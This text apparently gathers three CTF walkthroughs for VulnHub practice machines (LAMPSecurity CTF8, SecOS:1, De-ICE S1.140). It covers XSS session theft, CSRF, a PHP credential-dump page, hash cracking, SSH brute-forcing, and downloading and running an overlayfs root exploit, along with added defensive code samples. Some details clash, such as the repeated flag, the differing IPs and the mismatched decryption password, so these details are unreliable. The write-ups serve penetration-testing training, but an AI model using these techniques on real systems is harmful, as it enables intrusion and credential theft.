Hack the LAMPSecurity (CTF Challenge)


Welcome to another boot2root CTF challenge, “LAMPSecurity: CTF8”, uploaded by Creosote on VulnHub. The machine follows a theme, and you will need to snag the flags in order to complete the challenge. You can download it from: https://www.vulnhub.com/entry/lampsecurity-ctf8,87/
According to the author, it needs a good variety of techniques to get root, with no exploit development or buffer overflows. We solved the lab on the basis of our own experience and knowledge.
Level: Beginner
Penetrating Methodologies:
§  Network scanning (Nmap)
§  Surfing HTTP web services
§  Web vulnerability analysis (Nikto)
§  Directory brute-forcing (Dirb)
§  Burp Suite to capture and modify requests
§  Cracking the password hashes (John the Ripper)
§  SSH brute-force (Medusa)
§  Searching for and capturing the flag at various stages
Let’s start
First and foremost, we scan the IP address with nmap. In my case the target's IP address was 192.168.1.112.
nmap -A 192.168.1.112
As we can see, port 80 is open, so we scan it with nikto to check for web vulnerabilities.
nikto -h 192.168.1.112
From its result we learn that the site is vulnerable to XSS, and that a phpinfo.php page is also available.
Since port 80 was open, I explored the target IP in the web browser and was welcomed by the web page shown below.
While checking its view-source page, I found the first flag.
1st flag: #flag#550e1bafe077ff0b0b67f4e32f29d751
In our nikto result we found that phpinfo.php was available. Check it, as it contains various information about the PHP build and version on the target system; here we find another flag.
2nd flag: #flag#550e1bafe077ff0b0b67f4e32f29d751
Next, on the home page, we read the articles posted there. When you open a full article, you will notice a new directory named “content” in the URL.
As we haven’t seen this directory in the nikto result, we brute-force it with dirb for more details about the pages inside it.
dirb http://192.168.1.112/content
In the previous result we found a page inside the content directory named hidden; browse to it and you’ll find another flag.
3rd flag: #flag#57dbe55b42b307fb4115146d239955d0

Let us create a new user to access the user page.
Let us post a small script that prints hello on the page in the comment section of the article, to check for a cross-site scripting vulnerability.

After posting the comment, browse the page to check whether our script works: the alert proves that the cross-site scripting works.
Now let’s edit our script to get the session id of anyone who visits the page. Basically we want to capture the session id of Barbara, who is the author of this article. To get the session id, we make the visitor’s browser send a request to a URL consisting of our IP address and the cookie value, so that whenever anyone visits this page, the browser looks for that page on our server and our server logs the whole URL as an unreachable path. The script for that looks something like this:
After saving it, we send the link of this page to the author through the contact page in her profile.
Right after sending this link, start a Python web server on your Kali machine. After some time you will see error messages start to pop up in the log; from these messages you will find the session id of Barbara. The command to start the Python server goes like this:
Now go to the home page and refresh it to intercept the request in Burp Suite, then replace the existing session id with the one captured in the previous step and forward it to log in as Barbara.
After checking Barbara’s permissions, we learn that she can publish a page, so we create a PHP page that extracts data from the users table and dumps all usernames and password hashes. The code for this is something like this:
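The technique above works only because the comment body is echoed into the page unescaped and the session cookie is readable from script. As an added example, not code from the CTF or from Drupal, the Python below shows the two fixes a site owner would apply: HTML-escaping the comment before rendering it, and issuing the session cookie with HttpOnly and SameSite so that document.cookie cannot hand it to an injected script. The cookie name SESSID is an assumption.

```python
import html

# Constructed sample: the kind of probe comment posted in the walkthrough.
SAMPLE_COMMENT = '<script>alert("hello")</script> nice article'


def render_comment_vulnerable(body: str) -> str:
    """Echo the comment verbatim: the browser runs any <script> it contains."""
    return f'<div class="comment">{body}</div>'


def render_comment_safe(body: str) -> str:
    """Escape &, <, > and quotes so the comment is displayed as text, not markup."""
    return f'<div class="comment">{html.escape(body, quote=True)}</div>'


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Build the Set-Cookie value for the session id (cookie name SESSID is assumed).

    HttpOnly keeps the id out of document.cookie, so a script injected into a
    page cannot read and exfiltrate it; SameSite=Lax keeps it off cross-site
    requests; Secure restricts it to HTTPS.
    """
    attrs = [f"SESSID={session_id}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")
    return "; ".join(attrs)


def contains_active_markup(rendered: str) -> bool:
    """Demo check: is there still a live tag or handler in the rendered HTML?"""
    lowered = rendered.lower()
    return any(marker in lowered for marker in ("<script", "onerror=", "javascript:"))
```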
<?php
// Drupal 6 database API: query the users table and print every name:hash pair
$result = db_query('SELECT name, pass FROM users');
while ($record = db_fetch_object($result)) {
  print $record->name . ':' . $record->pass . "<br>\n";
}
?>
After saving, when you browse the page you will find that it has dumped the usernames and password hashes on the page. Save these credentials in a file.
Use John the Ripper to crack the password hashes:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 /root/Desktop/users.txt
After getting the usernames and passwords, we try to brute-force SSH on the target to check for working credentials. For this we use medusa, but none of the credentials succeed.
medusa -h 192.168.1.112 -U /root/Desktop/user_list.txt -P /root/Desktop/pass.txt -M ssh
Let’s go back to basics: we know that each mail user has a display name that differs from the actual username, but the username is always used in the mail address, so we go to each user’s profile, copy the username from the mail address and make a new user list.
For example: Steve Pinkton’s profile name is spinkton.
Let’s try to brute-force again. This time we are successful, as three of the usernames have their password in the list we made from the cracked hashes.
Now let’s log in to the target with the first credentials. A flag is shown along with the banner when you log in; then list all files and directories and you’ll find a file named flag; check its contents to discover one more flag.
4th flag: #flag#5e937c51b852e1ee90d42ddb5ccb8997
ls
cat flag.txt
5th flag: #flag#0ab251c07822d26b07b88136739ae39b
Here we try to escalate privileges with the sudo su command, but it gives an error that jharraway is not in the sudoers file.
Close the current connection and log in to the target with the second user’s (bdio’s) credentials, then list all files and directories; here you’ll find a file named flag, check its contents to discover one flag.
Here we try to escalate privileges with sudo su again, but it gives an error that bdio is not in the sudoers file.
Again close the connection and connect with the third credentials. Use ls to list files; here too you’ll find a file named flag, check its contents to get one more flag. Let’s try to escalate privileges with sudo su and BANG, you are now logged in as root. List all files with ls to discover another file named flag.txt; it holds the same value as the 5th flag. Check its contents to discover another flag.
ssh spinkton@192.168.1.112
ls
cat flag.txt
sudo su
ls
cat flag.txt
6th flag: #flag#fd38e201f27e98e13abcf62890c43303

You will also find one flag in /etc/passwd; to check it use:

cat /etc/passwd
7th flag: #flag#5b650c18929383074fea8870d857dd2e
Wow!! We finished this challenge by grabbing all the hidden flags.

Hack the SecOS:1 (CTF Challenge)


Hello readers, and welcome to another CTF challenge. It was developed by PaulWebSec. The aim of this lab is to get root on the VM and read the congratulatory message. The virtual machine can be downloaded here. I quickly loaded up the machine and it was primed and ready!
Steps involved:
§  IP discovery and port scanning
§  Running the web app
§  Running a CSRF attack on the administrator
§  Tricking the admin into visiting a fake page by sending him a message
§  Waiting a few minutes to let the admin visit that page
§  Getting credentials and logging in to SSH with them
§  Running the overlayfs exploit on the system
§  Getting root access!
So, let’s start.
I need not say this after so many articles, but the first and foremost step is running netdiscover to find the IP address of the VM.
The IP address in my case was 192.168.1.128
I ran an aggressive nmap scan on this IP address to find which ports were open and the first clue to start the attack from.
We found a web app working on port 8081. Without any delay we opened it.
The first hint was the message shown on the page: “Secure Web App is a part of the vulnerable VM called secOS-2”.
Hence, we inferred that this VM has web-based vulnerabilities. The next step was a nikto scan, which didn’t yield much information either.
So we ran dirb in the hope of finding something useful.
Of course there is a login page! And a login page in a vulnerable web app means a route to a shell!
We moved directly to the login page.


Inspecting the page gave no satisfactory results, but there was still a user registration page available to us. We headed over there.
So we created a new user with the help of the register form. You can use any name you want, but sooner or later you’ll find, as we did, that it isn’t of much use. More on that later.
Since we got redirected to the home page, it was fair to assume we had been registered. Let’s try to log in to the web app with that user.
There wasn’t much information on the page, except that we saw a “My Messages” tab on the home page.
It is worth noting that Burp Spider showed us a page called “hint”, and on inspecting that page we found the following details:

First: The admin visits the site very frequently.
Second: He runs it locally on 127.0.0.1
Third: CSRF is applicable!

After some looking around, we found under the “users” tab that Spiderman was the administrator. Could we prompt the admin to change his password to one of our choosing?

Hence, we wrote a quick HTML CSRF page in a text file and saved it as csrf.html inside /var/www/html.
What this does is make the administrator’s browser change his password to “passw0rd”.
We saved the page to the /var/www/html directory, started Apache, let the HTML page do its work, waited 2-3 minutes, and we were able to log in to the administrator account!
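The forged password change succeeds because the request carries nothing but the admin’s session cookie, which the browser attaches automatically. As an added example, not SecOS’s own code, the Python below sketches a password-change handler that refuses such a request: it requires a per-session synchronizer token in the form body and checks the request’s Origin against the site’s own. The origin http://127.0.0.1:8081 and the field names are assumptions.

```python
import hmac
import secrets
from typing import Dict

# Assumption: the app the admin visits from 127.0.0.1 is served on port 8081.
SITE_ORIGIN = "http://127.0.0.1:8081"


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Mint one random token per login session; the real form embeds it in a
    hidden field. A page on another origin cannot read it, so it cannot forge
    a complete request."""
    if "csrf" not in session:
        session["csrf"] = secrets.token_hex(32)
    return session["csrf"]


def change_password(session: Dict[str, str], form: Dict[str, str],
                    headers: Dict[str, str]) -> str:
    """Return 'ok' or a refusal reason.

    `session` is the server-side state bound to the session cookie, `form` the
    POST body and `headers` the request headers. Either check alone stops the
    forged POST from the walkthrough: it comes from another origin and it
    carries no token.
    """
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return "refused: cross-origin request"
    expected = session.get("csrf", "")
    submitted = form.get("csrf_token", "")
    # Constant-time compare on bytes, so non-ASCII input cannot raise.
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return "refused: bad or missing CSRF token"
    new_password = form.get("password", "")
    if len(new_password) < 12:
        return "refused: password too short"
    session["password"] = new_password  # stand-in for the user-store update
    return "ok"
```

Re-prompting for the current password on this form is a further control that the forged page could not satisfy either.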
We found 2 messages from the user pirate. One had a password for an unidentified service. Could it be a password for SSH?
We tried it out!

ssh spiderman@192.168.1.136



It worked!!
Next, we looked up the kernel version of the machine.

uname -a


After a couple of minutes searching for exploits for this kernel version, we found something useful for our purpose.


It is exploitable with an exploit called “overlayfs”.
We downloaded and ran it.
cd /tmp
wget https://www.exploit-db.com/download/37292.c
gcc -o exploit 37292.c


After it got compiled using gcc, we ran it using:
./exploit
whoami


Voila! It gave us root shell.
cd /root
ls
cat flag.txt
And just like that, it was over. Hope you enjoyed.



Hack the De-ICE: S1.140 (Boot to Root)


Hello friends!! Today we are going to solve the De-ICE: S1.140 CTF challenge, presented by VulnHub for penetration-testing practice. This lab is proposed for OSCP practice and its difficulty level is medium. You can download it from this link: https://www.vulnhub.com/entry/de-ice-s1140,57/
Penetrating Methodologies:
§  Network scanning (Nmap)
§  HTTP directory brute-force (Dirb)
§  Obtain auth log
§  HTTPS directory brute-force (Dirb)
§  Login to phpMyAdmin
§  Steal database credentials
§  FTP login to get tar file
§  SSH login to get backup.sh
§  Extracting tar file to get shadow file
§  Crack hashes (John the Ripper)
§  Sudo privilege escalation
§  Get secret.jpg

Let’s Begin!!
You will get the target VM’s IP address at boot time, so let’s start with nmap port enumeration by executing the following command in the terminal.
nmap -sV 192.168.1.110
Since port 80 was open, I explored the target IP in the web browser. Here you need to select the lines on the page to reveal the hint; at the end you will find the text shown in the image below.
Even after reading the above hint I didn’t get any remarkable clue for the next step, so I used dirb for a directory brute-force attack on HTTP.
dirb http://192.168.1.110
From its result I found many web directories, but /forum and its sub-directories looked most interesting to me.
Then we navigate to /forum and observe the following web page.
Further, we explored /forum/index.php and noticed the following web page, which was an auth log for SSH logins. Looking at the log again, I noticed that there was only one successful login, from user mbrown. So I copied this log into a text file named file.txt.
Then, with the help of the following commands, we grep every invalid user who tried to log in, and the opened SSH sessions.
cat file.txt | grep "Invalid user" | awk '{print $8}'
cat file.txt | grep "open"
One of the user names we grabbed from file.txt, !DFiuoTkbxtdk0!, turned out to be the password for mbrown.
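The two one-liners above pull the failed usernames and the opened session out of the leaked log by hand. As an added example, not part of the original walkthrough, this Python does the same over a few constructed sshd lines in the same syslog format and goes a step further: it groups failures by source address and flags usernames that look like mistyped passwords, which is how a defender reading that log would spot both the brute-force and the credential leak.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sshd lines in the syslog format the /forum page leaked. The third
# "Invalid user" line shows the give-away from the walkthrough: a password
# typed into the username field ends up in the log in clear text.
SAMPLE_LOG = """\
Jan 11 20:12:01 webhost sshd[2341]: Invalid user admin from 192.168.1.50
Jan 11 20:12:03 webhost sshd[2342]: Invalid user oracle from 192.168.1.50
Jan 11 20:12:04 webhost sshd[2343]: Invalid user !DFiuoTkbxtdk0! from 192.168.1.50
Jan 11 20:12:06 webhost sshd[2344]: Invalid user test from 10.0.0.7
Jan 11 20:12:09 webhost sshd[2345]: Accepted password for mbrown from 192.168.1.50 port 51234 ssh2
Jan 11 20:12:09 webhost sshd[2345]: pam_unix(sshd:session): session opened for user mbrown by (uid=0)
"""

INVALID_RE = re.compile(r"Invalid user (\S+) from (\S+)")
OPENED_RE = re.compile(r"session opened for user (\S+)")
SANE_USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_.-]*$")


def invalid_users(log: str) -> List[Tuple[str, str]]:
    """Equivalent of grep "Invalid user" | awk '{print $8}', keeping the source IP."""
    return [m.groups() for line in log.splitlines() if (m := INVALID_RE.search(line))]


def opened_sessions(log: str) -> List[str]:
    """Equivalent of grep "open": users for whom sshd actually opened a session."""
    return [m.group(1) for line in log.splitlines() if (m := OPENED_RE.search(line))]


def failures_by_source(log: str) -> Dict[str, int]:
    """Count invalid-user attempts per source IP: a burst from one address is
    the brute-force pattern a defender alerts on."""
    return dict(Counter(ip for _, ip in invalid_users(log)))


def odd_usernames(log: str) -> List[str]:
    """Invalid usernames that do not look like account names at all. These are
    often passwords mistyped into the login prompt and should be treated as
    leaked secrets (rotate them) rather than left in a world-readable log."""
    return [user for user, _ in invalid_users(log) if not SANE_USERNAME_RE.match(user)]
```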
I tried to log in to the forum as mbrown with the password found above, logged in successfully and found mbrown’s email address on his profile page, as shown:
After that I ran dirb on port 443 and noticed that some exclusive directories such as /webmail and /phpmyadmin are also available.
When I explored https://192.168.1.110/webmail, I got a SquirrelMail login page, where I submitted mbrown’s credentials:
Name: mb@lazyadmin.corp
Password: !DFiuoTkbxtdk0!
In his mailbox I found mysql login information:
username: root
Password: S4!y.dk)j/_d1pKtX1
As we enumerated that /phpmyadmin is also available, I explored it and submitted the MySQL login information found above.
I successfully logged in to the database and, with a little more effort, found all usernames and their hashed passwords, which I copied for cracking.
With the help of an online MD5 decryption service we recovered two of the hash values.
So now we have the following credentials:
Rhedley: tum-ti-tum
Swillard: Austin-Willard
Now let’s try to connect with FTP with the following:
ftp 192.168.1.110
I was able to view the contents of the incoming directory, which held a file backup_webhost_130111.tar.gz.enc that I downloaded with the get command.
get backup_webhost_130111.tar.gz.enc


Then I explored further and found a .ssh directory containing an SSH key “downloadkey” for user mbrown. I downloaded this as well.
get downloadkey


Now let’s try to log in over SSH with the key enumerated above.
ssh -i downloadkey mbrown@192.168.1.110
Bravo!! We successfully got a shell on the victim’s machine. Then I switched to user rhedley, where I found a script backup.sh that holds the command and password used to encrypt the backup_webhost_130111.tar.gz.enc file I downloaded earlier.
su rhedley
cd /opt
ls
cat backup.sh
And found that the encryption is aes-256-cbc with the password 8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1


Now let’s decrypt backup_webhost_130111.tar.gz.enc with the following command:
openssl aes-256-cbc -d -md md5 -in backup_webhost_130111.tar.gz.enc -out file.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
tar -xvf file.tar.gz
Great!! It was a compressed archive of the /etc directory, and after extracting it we own all the valuable files of the victim’s /etc directory.


This gave me the shadow file, which I opened with the cat command.
cd etc
cat shadow
As you can see, I found hashes for three users; let’s try to crack them. Here I have saved all three entries into a text file named cracked.


Then I used the following command to prepare the shadow hashes for cracking, but failed to crack the hash of the third user, sraines.
unshadow passwd shadow > cracked


Then I used the darkcode.txt wordlist for password cracking, and it took a long time to get the password for sraines, whose account is renamed as swillard.
john cracked --wordlist=/root/darkcode.txt
So we got following credential:
User: sraines
Password: brillantissimo


So when I tried to log in as swillard with brillantissimo (the password of sraines), it worked and I successfully logged in as swillard. Then I checked the sudo rights and found this user has ALL privileges, which means he has root privileges.
su swillard
sudo -l
sudo su
cd /root
ls
Inside the /root directory I found an image, secret.jpg, which I moved into the web directory.
mv secret.jpg /var/www/forum/templates_c/secret.jpg


So when I browsed to the above path I got the image of a birthday cake!!